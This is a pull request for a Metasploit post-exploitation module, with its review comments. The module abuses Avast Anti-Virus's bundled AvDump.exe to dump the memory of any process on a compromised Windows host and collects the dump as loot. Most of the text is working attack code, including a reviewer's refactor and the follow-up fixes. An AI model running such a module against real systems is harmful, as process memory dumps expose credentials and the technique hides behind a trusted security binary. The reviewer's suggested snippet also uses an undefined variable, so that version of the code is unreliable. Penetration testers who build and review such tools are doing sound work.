modules/post/windows/gather/avast_memory_dump.rb

```diff
@@ -0,0 +1,45 @@
+require 'rbconfig'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'          => 'Avast AV Memory Dumping Utility',
+        'Description'   => %q{
+            This module leverages an Avast Anti-Virus memory dump utility that is shipped
+            by default with Avast Anti-Virus Home software suite.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'DLL_Cool_J' ],
+        'Platform'      => [ 'win'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+    ))
+
+    register_options ( [
+        OptString.new('PID', [true, 'specify pid to dump' ]),
+        OptString.new('DUMP_PATH', [true, 'specify location to write dump file to', "C:\\Users\\Public\\tmp.dmp"])
+    ])
+  end
+
+  def check_for_dump
+    if file_exist?("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe")
+        print_status("AvDump.exe exists!")
+        return true
+    else
+        print_error("AvDump.exe does not exist on target.")
+        return false
+    end
+
+  end
+
+  def run
+    if check_for_dump
+        print_status("executing Avast mem dump utility against #{datastore['PID']} to #{datastore['DUMP_PATH']}")
+        result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{datastore['PID']} --exception_ptr 0 --thread_id 0 --dump_file #{datastore['DUMP_PATH']} --min_interval 0")
+        mem_file = read_file("#{datastore['DUMP_PATH']}")
+        store_loot("host.avast.memdump", "binary/db", session, mem_file)
+        print_status(result)
+    end
+  end
+end
```

Comment:
The `AvDump.exe` command line argument `dump_file` should be quoted.

The module should check if `dump_file` is created.

The `dump_file` should be cleaned up upon completion.

Also, given that `check_for_dump` is called only once, something like this would be cleaner:

```suggestion
  def avdump_exists?
    file_exist?("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe")
  end

  def run
    fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump_exists?

    print_status('AvDump.exe exists!')

    dump_path = datastore['DUMP_PATH'].to_s

    print_status("Executing Avast mem dump utility against #{datastore['PID']} to #{dump_path}")

    result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{datastore['PID']} --exception_ptr 0 --thread_id 0 --dump_file '#{dump_path}' --min_interval 0")
    
    fail_with(Failure::Unknown, "Dump file #{dump_file} was not created") unless file_exist?(dump_file)

    mem_file = read_file(dump_path)
    store_loot('host.avast.memdump', 'binary/db', session, mem_file)
    print_status(result)
    rm_f(dump_file)
  end
end
```

Reply:
This makes a lot of sense! Thank you for the feedback, I will integrate this tonight.

Reply:
The changes look good. Is there a reason you skipped adding this?

```ruby
fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
```

Reply:
Woops! I didn't re-add it when I was troubleshooting some path quoting issues.
I have re-added it.